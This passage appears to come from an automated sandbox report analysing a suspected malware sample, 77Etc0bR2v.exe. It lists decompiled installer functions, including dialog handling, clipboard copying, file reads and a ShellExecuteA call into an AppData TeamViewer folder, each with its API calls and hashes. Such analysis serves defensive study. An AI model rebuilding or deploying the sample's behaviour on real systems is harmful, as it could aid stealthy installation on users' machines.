                                                                                                                        				if(_t16 < 0x21) {
                                                                                                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\TeamViewer,?), ref: 00401E07
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401DF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecuteShell
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 587946157-4213038595
                                                                                                                        • Opcode ID: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                                        • Instruction ID: e70fe2a762fbf0658a98981193bf00505e6ec524d5fd87abb86dead059a1e580
                                                                                                                        • Opcode Fuzzy Hash: 7f9428e02b8fb4388b1cdde539cce81515ded46ead36c0b4657541fb92161dc4
                                                                                                                        • Instruction Fuzzy Hash: 7BF0C872B04201AAC751AFB59D4AA5E26A8AB41398F200637F510F61C1D9BD8841A658
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E00401389(signed int _a4) {
                                                                                                                        				intOrPtr* _t6;
                                                                                                                        				void* _t8;
                                                                                                                        				void* _t10;
                                                                                                                        				signed int _t11;
                                                                                                                        				void* _t12;
                                                                                                                        				signed int _t16;
                                                                                                                        				signed int _t17;
                                                                                                                        				void* _t18;
                                                                                                                        
                                                                                                                        				_t17 = _a4;
                                                                                                                        				while(_t17 >= 0) {
                                                                                                                        					_t6 = _t17 * 0x1c +  *0x423ed0;
                                                                                                                        					if( *_t6 == 1) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_push(_t6); // executed
                                                                                                                        					_t8 = E00401434(); // executed
                                                                                                                        					if(_t8 == 0x7fffffff) {
                                                                                                                        						return 0x7fffffff;
                                                                                                                        					}
                                                                                                                        					_t10 = E0040136D(_t8);
                                                                                                                        					if(_t10 != 0) {
                                                                                                                        						_t11 = _t10 - 1;
                                                                                                                        						_t16 = _t17;
                                                                                                                        						_t17 = _t11;
                                                                                                                        						_t12 = _t11 - _t16;
                                                                                                                        					} else {
                                                                                                                        						_t12 = _t10 + 1;
                                                                                                                        						_t17 = _t17 + 1;
                                                                                                                        					}
                                                                                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                                        						 *0x42368c =  *0x42368c + _t12;
                                                                                                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return 0;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                        • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                                                        • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                                                        • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E0040583D(CHAR* _a4, long _a8, long _a12) {
                                                                                                                        				signed int _t5;
                                                                                                                        				void* _t6;
                                                                                                                        
                                                                                                                        				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                        				return _t6;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00405841
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004035BD() {
                                                                                                                        				void* _t1;
                                                                                                                        				void* _t2;
                                                                                                                        				void* _t7;
                                                                                                                        				signed int _t12;
                                                                                                                        
                                                                                                                        				_t1 =  *0x409014; // 0xffffffff
                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                        					CloseHandle(_t1);
                                                                                                                        					 *0x409014 =  *0x409014 | 0xffffffff;
                                                                                                                        				}
                                                                                                                        				_t2 =  *0x409018; // 0xffffffff
                                                                                                                        				if(_t2 != 0xffffffff) {
                                                                                                                        					CloseHandle(_t2);
                                                                                                                        					 *0x409018 =  *0x409018 | 0xffffffff;
                                                                                                                        					_t12 =  *0x409018;
                                                                                                                        				}
                                                                                                                        				E0040361A();
                                                                                                                        				return E0040548B(_t7, _t12, 0x42a800, 7);
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035CF
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,0040342D,00000000), ref: 004035E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004031BF(void* _a4, long _a8) {
                                                                                                                        				int _t6;
                                                                                                                        				long _t10;
                                                                                                                        
                                                                                                                        				_t10 = _a8;
                                                                                                                        				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                                                                                        				if(_t6 == 0 || _a8 != _t10) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004031F1(long _a4) {
                                                                                                                        				long _t2;
                                                                                                                        
                                                                                                                        				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                                                                                        				return _t2;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				long _v12;
                                                                                                                        				struct tagRECT _v28;
                                                                                                                        				void* _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				int _v44;
                                                                                                                        				void* _v48;
                                                                                                                        				signed int _v52;
                                                                                                                        				int _v56;
                                                                                                                        				void* _v60;
                                                                                                                        				void* _v68;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				long _t87;
                                                                                                                        				unsigned int _t92;
                                                                                                                        				int _t94;
                                                                                                                        				int _t95;
                                                                                                                        				void* _t101;
                                                                                                                        				intOrPtr _t122;
                                                                                                                        				struct HWND__* _t126;
                                                                                                                        				int _t148;
                                                                                                                        				int _t149;
                                                                                                                        				struct HWND__* _t153;
                                                                                                                        				struct HWND__* _t157;
                                                                                                                        				struct HMENU__* _t159;
                                                                                                                        				long _t161;
                                                                                                                        				void* _t162;
                                                                                                                        				short* _t163;
                                                                                                                        
                                                                                                                        				_t153 =  *0x423684;
                                                                                                                        				_t148 = 0;
                                                                                                                        				_v8 = _t153;
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					if(_a8 == 0x405) {
                                                                                                                        						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                                                        					}
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L17:
                                                                                                                        						if(_a8 != 0x404) {
                                                                                                                        							L25:
                                                                                                                        							if(_a8 != 0x7b || _a12 != _t153) {
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								_t87 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                                                                                                        								_a8 = _t87;
                                                                                                                        								if(_t87 <= _t148) {
                                                                                                                        									L37:
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        								_t159 = CreatePopupMenu();
                                                                                                                        								AppendMenuA(_t159, _t148, 1, E00405B88(_t148, _t153, _t159, _t148, 0xffffffe1));
                                                                                                                        								_t92 = _a16;
                                                                                                                        								if(_t92 != 0xffffffff) {
                                                                                                                        									_t149 = _t92;
                                                                                                                        									_t94 = _t92 >> 0x10;
                                                                                                                        								} else {
                                                                                                                        									GetWindowRect(_t153,  &_v28);
                                                                                                                        									_t149 = _v28.left;
                                                                                                                        									_t94 = _v28.top;
                                                                                                                        								}
                                                                                                                        								_t95 = TrackPopupMenu(_t159, 0x180, _t149, _t94, _t148, _a4, _t148);
                                                                                                                        								_t161 = 1;
                                                                                                                        								if(_t95 == 1) {
                                                                                                                        									_v60 = _t148;
                                                                                                                        									_v48 = 0x4204a0;
                                                                                                                        									_v44 = 0xfff;
                                                                                                                        									_a4 = _a8;
                                                                                                                        									do {
                                                                                                                        										_a4 = _a4 - 1;
                                                                                                                        										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                                                                                        									} while (_a4 != _t148);
                                                                                                                        									OpenClipboard(_t148);
                                                                                                                        									EmptyClipboard();
                                                                                                                        									_t101 = GlobalAlloc(0x42, _t161);
                                                                                                                        									_a4 = _t101;
                                                                                                                        									GlobalFix(_t101);
                                                                                                                        									_t162 = _t101;
                                                                                                                        									do {
                                                                                                                        										_v48 = _t162;
                                                                                                                        										_t163 = _t162 + SendMessageA(_v8, 0x102d, _t148,  &_v68);
                                                                                                                        										 *_t163 = 0xa0d;
                                                                                                                        										_t162 = _t163 + 2;
                                                                                                                        										_t148 = _t148 + 1;
                                                                                                                        									} while (_t148 < _a8);
                                                                                                                        									GlobalUnWire(_a4);
                                                                                                                        									SetClipboardData(1, _a4);
                                                                                                                        									CloseClipboard();
                                                                                                                        								}
                                                                                                                        								goto L37;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if( *0x42366c == _t148) {
                                                                                                                        							ShowWindow( *0x423ea8, 8);
                                                                                                                        							if( *0x423f2c == _t148) {
                                                                                                                        								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t148);
                                                                                                                        							}
                                                                                                                        							E00403EF1(1);
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						 *0x41f868 = 2;
                                                                                                                        						E00403EF1(0x78);
                                                                                                                        						goto L20;
                                                                                                                        					} else {
                                                                                                                        						if(_a12 != 0x403) {
                                                                                                                        							L20:
                                                                                                                        							return E00403F7F(_a8, _a12, _a16);
                                                                                                                        						}
                                                                                                                        						ShowWindow( *0x423670, _t148);
                                                                                                                        						ShowWindow(_t153, 8);
                                                                                                                        						E00403F4D(_t153);
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_v52 = _v52 | 0xffffffff;
                                                                                                                        				_v40 = _v40 | 0xffffffff;
                                                                                                                        				_v60 = 2;
                                                                                                                        				_v56 = 0;
                                                                                                                        				_v48 = 0;
                                                                                                                        				_v44 = 0;
                                                                                                                        				asm("stosd");
                                                                                                                        				asm("stosd");
                                                                                                                        				_t122 =  *0x423eb0;
                                                                                                                        				_a8 =  *((intOrPtr*)(_t122 + 0x5c));
                                                                                                                        				_a12 =  *((intOrPtr*)(_t122 + 0x60));
                                                                                                                        				 *0x423670 = GetDlgItem(_a4, 0x403);
                                                                                                                        				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                                                                                                                        				_t126 = GetDlgItem(_a4, 0x3f8);
                                                                                                                        				 *0x423684 = _t126;
                                                                                                                        				_v8 = _t126;
                                                                                                                        				E00403F4D( *0x423670);
                                                                                                                        				 *0x423674 = E004047A6(4);
                                                                                                                        				 *0x42368c = 0;
                                                                                                                        				GetClientRect(_v8,  &_v28);
                                                                                                                        				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                                                        				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                        				if(_a8 >= 0) {
                                                                                                                        					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                                                        					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                                                        				}
                                                                                                                        				if(_a12 >= _t148) {
                                                                                                                        					SendMessageA(_v8, 0x1024, _t148, _a12);
                                                                                                                        				}
                                                                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                        				_push(0x1b);
                                                                                                                        				E00403F18(_a4);
                                                                                                                        				if(( *0x423eb8 & 0x00000003) != 0) {
                                                                                                                        					ShowWindow( *0x423670, _t148);
                                                                                                                        					if(( *0x423eb8 & 0x00000002) != 0) {
                                                                                                                        						 *0x423670 = _t148;
                                                                                                                        					} else {
                                                                                                                        						ShowWindow(_v8, 8);
                                                                                                                        					}
                                                                                                                        					E00403F4D( *0x423668);
                                                                                                                        				}
                                                                                                                        				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                                                                        				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                                                                                                        				if(( *0x423eb8 & 0x00000004) != 0) {
                                                                                                                        					SendMessageA(_t157, 0x409, _t148, _a12);
                                                                                                                        					SendMessageA(_t157, 0x2001, _t148, _a8);
                                                                                                                        				}
                                                                                                                        				goto L37;
                                                                                                                        			}
































                                                                                                                        0x00405191
                                                                                                                        0x004051a5
                                                                                                                        0x004051a5
                                                                                                                        0x004051b9
                                                                                                                        0x004051c2
                                                                                                                        0x004051cb
                                                                                                                        0x004051db
                                                                                                                        0x004051e7
                                                                                                                        0x004051e7
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32 ref: 004050A1
                                                                                                                        • GetDlgItem.USER32 ref: 004050B0
                                                                                                                        • GetClientRect.USER32 ref: 004050ED
                                                                                                                        • GetSystemMetrics.USER32 ref: 004050F5
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405116
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405127
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040513A
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405148
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040515B
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                                                        • GetDlgItem.USER32 ref: 004051B2
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051C2
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051DB
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004051E7
                                                                                                                        • GetDlgItem.USER32 ref: 004050BF
                                                                                                                          • Part of subcall function 00403F4D: SendMessageA.USER32(00000028,?,00000001,00403D7E), ref: 00403F5B
                                                                                                                        • GetDlgItem.USER32 ref: 00405204
                                                                                                                        • CreateThread.KERNEL32 ref: 00405212
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                                                        • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405289
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052BB
                                                                                                                        • CreatePopupMenu.USER32 ref: 004052CC
                                                                                                                        • AppendMenuA.USER32 ref: 004052E1
                                                                                                                        • GetWindowRect.USER32 ref: 004052F4
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405353
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                                                        • GlobalFix.KERNEL32(00000000), ref: 0040537C
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405390
                                                                                                                        • GlobalUnWire.KERNEL32 ref: 004053A8
                                                                                                                        • SetClipboardData.USER32 ref: 004053B3
                                                                                                                        • CloseClipboard.USER32 ref: 004053B9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleMetricsOpenSystemThreadTrackWire
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 1854847162-366298937
                                                                                                                        • Opcode ID: b02f2e9079c5817fef39b267f28514b86047bb53c7fcbf471c402ec640d3569d
                                                                                                                        • Instruction ID: b28aa7ce0402c6385ba5b6cd868a6258f1d07b471923b7bae974b2a68da01879
                                                                                                                        • Opcode Fuzzy Hash: b02f2e9079c5817fef39b267f28514b86047bb53c7fcbf471c402ec640d3569d
                                                                                                                        • Instruction Fuzzy Hash: 34A14870904208FFDB219F60DD89AAE7F79FB08355F00417AFA05BA2A0C7795A41DF69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00404853(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                                                        				struct HWND__* _v8;
                                                                                                                        				struct HWND__* _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				intOrPtr _v20;
                                                                                                                        				void* _v24;
                                                                                                                        				long _v28;
                                                                                                                        				int _v32;
                                                                                                                        				signed int _v40;
                                                                                                                        				int _v44;
                                                                                                                        				signed int* _v56;
                                                                                                                        				intOrPtr _v60;
                                                                                                                        				signed int _v64;
                                                                                                                        				long _v68;
                                                                                                                        				void* _v72;
                                                                                                                        				intOrPtr _v76;
                                                                                                                        				intOrPtr _v80;
                                                                                                                        				void* _v84;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				struct HWND__* _t182;
                                                                                                                        				int _t196;
                                                                                                                        				long _t202;
                                                                                                                        				signed int _t206;
                                                                                                                        				signed int _t217;
                                                                                                                        				long _t220;
                                                                                                                        				void* _t221;
                                                                                                                        				int _t227;
                                                                                                                        				signed int _t232;
                                                                                                                        				signed int _t233;
                                                                                                                        				signed int _t240;
                                                                                                                        				struct HBITMAP__* _t250;
                                                                                                                        				long _t251;
                                                                                                                        				long _t252;
                                                                                                                        				char* _t268;
                                                                                                                        				signed char _t269;
                                                                                                                        				long _t274;
                                                                                                                        				int _t280;
                                                                                                                        				signed int* _t281;
                                                                                                                        				int _t282;
                                                                                                                        				long _t283;
                                                                                                                        				int _t285;
                                                                                                                        				long _t286;
                                                                                                                        				signed int _t287;
                                                                                                                        				long _t288;
                                                                                                                        				signed int _t291;
                                                                                                                        				signed int _t298;
                                                                                                                        				signed int _t300;
                                                                                                                        				signed int _t302;
                                                                                                                        				int* _t310;
                                                                                                                        				void* _t311;
                                                                                                                        				int _t315;
                                                                                                                        				int _t316;
                                                                                                                        				int _t317;
                                                                                                                        				signed int _t318;
                                                                                                                        				intOrPtr _t320;
                                                                                                                        
                                                                                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                        				_t182 = GetDlgItem(_a4, 0x408);
                                                                                                                        				_t280 =  *0x423ec8;
                                                                                                                        				_t320 =  *0x407244;
                                                                                                                        				_v8 = _t182;
                                                                                                                        				_t315 = 0;
                                                                                                                        				_v32 = _t280;
                                                                                                                        				_v20 =  *0x423eb0 + 0x94;
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					L23:
                                                                                                                        					if(_a8 != 0x405) {
                                                                                                                        						_t289 = _a16;
                                                                                                                        					} else {
                                                                                                                        						_a12 = _t315;
                                                                                                                        						_t289 = 1;
                                                                                                                        						_a8 = 0x40f;
                                                                                                                        						_a16 = 1;
                                                                                                                        					}
                                                                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                        						_v16 = _t289;
                                                                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                                                                        							if(( *0x423eb9 & 0x00000002) != 0) {
                                                                                                                        								L41:
                                                                                                                        								if(_v16 != _t315) {
                                                                                                                        									_t232 = _v16;
                                                                                                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                                                        										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                                                        									}
                                                                                                                        									_t233 = _v16;
                                                                                                                        									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                                                        										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                                                                        										} else {
                                                                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L48;
                                                                                                                        							}
                                                                                                                        							if(_a8 == 0x413) {
                                                                                                                        								L33:
                                                                                                                        								_t289 = 0 | _a8 != 0x00000413;
                                                                                                                        								_t240 = E004047D3(_v8, _a8 != 0x413);
                                                                                                                        								if(_t240 >= _t315) {
                                                                                                                        									_t93 = _t280 + 8; // 0x8
                                                                                                                        									_t310 = _t240 * 0x418 + _t93;
                                                                                                                        									_t289 =  *_t310;
                                                                                                                        									if((_t289 & 0x00000010) == 0) {
                                                                                                                        										if((_t289 & 0x00000040) == 0) {
                                                                                                                        											_t298 = _t289 ^ 0x00000001;
                                                                                                                        										} else {
                                                                                                                        											_t300 = _t289 ^ 0x00000080;
                                                                                                                        											if(_t300 >= 0) {
                                                                                                                        												_t298 = _t300 & 0xfffffffe;
                                                                                                                        											} else {
                                                                                                                        												_t298 = _t300 | 0x00000001;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										 *_t310 = _t298;
                                                                                                                        										E0040117D(_t240);
                                                                                                                        										_t289 = 1;
                                                                                                                        										_a8 = 0x40f;
                                                                                                                        										_a12 = 1;
                                                                                                                        										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        							_t289 = _a16;
                                                                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                        								goto L41;
                                                                                                                        							}
                                                                                                                        							goto L33;
                                                                                                                        						} else {
                                                                                                                        							goto L48;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						L48:
                                                                                                                        						if(_a8 != 0x111) {
                                                                                                                        							L56:
                                                                                                                        							if(_a8 == 0x200) {
                                                                                                                        								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                                                        							}
                                                                                                                        							if(_a8 == 0x40b) {
                                                                                                                        								_t220 =  *0x42047c;
                                                                                                                        								if(_t220 != _t315) {
                                                                                                                        									 *0x40702c(_t220);
                                                                                                                        								}
                                                                                                                        								_t221 =  *0x420494;
                                                                                                                        								if(_t221 != _t315) {
                                                                                                                        									GlobalFree(_t221);
                                                                                                                        								}
                                                                                                                        								 *0x42047c = _t315;
                                                                                                                        								 *0x420494 = _t315;
                                                                                                                        								 *0x423f00 = _t315;
                                                                                                                        							}
                                                                                                                        							if(_a8 != 0x40f) {
                                                                                                                        								L86:
                                                                                                                        								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
                                                                                                                        									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                        									ShowWindow(_v8, _t316);
                                                                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                                                        								}
                                                                                                                        								goto L89;
                                                                                                                        							} else {
                                                                                                                        								E004011EF(_t289, _t315, _t315);
                                                                                                                        								if(_a12 != _t315) {
                                                                                                                        									E0040140B(8);
                                                                                                                        								}
                                                                                                                        								if(_a16 == _t315) {
                                                                                                                        									L73:
                                                                                                                        									E004011EF(_t289, _t315, _t315);
                                                                                                                        									_v32 =  *0x420494;
                                                                                                                        									_t196 =  *0x423ec8;
                                                                                                                        									_v60 = 0xf030;
                                                                                                                        									_v16 = _t315;
                                                                                                                        									if( *0x423ecc <= _t315) {
                                                                                                                        										L84:
                                                                                                                        										InvalidateRect(_v8, _t315, 1);
                                                                                                                        										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
                                                                                                                        											E004046F1(0x3ff, 0xfffffffb, E004047A6(5));
                                                                                                                        										}
                                                                                                                        										goto L86;
                                                                                                                        									}
                                                                                                                        									_t281 = _t196 + 8;
                                                                                                                        									do {
                                                                                                                        										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                                                        										if(_t202 != _t315) {
                                                                                                                        											_t291 =  *_t281;
                                                                                                                        											_v68 = _t202;
                                                                                                                        											_v72 = 8;
                                                                                                                        											if((_t291 & 0x00000001) != 0) {
                                                                                                                        												_v72 = 9;
                                                                                                                        												_v56 =  &(_t281[4]);
                                                                                                                        												_t281[0] = _t281[0] & 0x000000fe;
